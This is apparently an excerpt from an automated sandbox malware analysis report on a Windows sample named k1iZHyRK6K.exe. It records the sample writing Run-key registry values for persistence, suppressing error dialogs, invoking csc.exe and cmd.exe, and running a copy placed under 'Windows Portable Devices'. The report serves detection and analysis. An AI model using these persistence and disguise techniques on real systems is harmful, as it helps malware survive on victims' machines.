Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb	Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
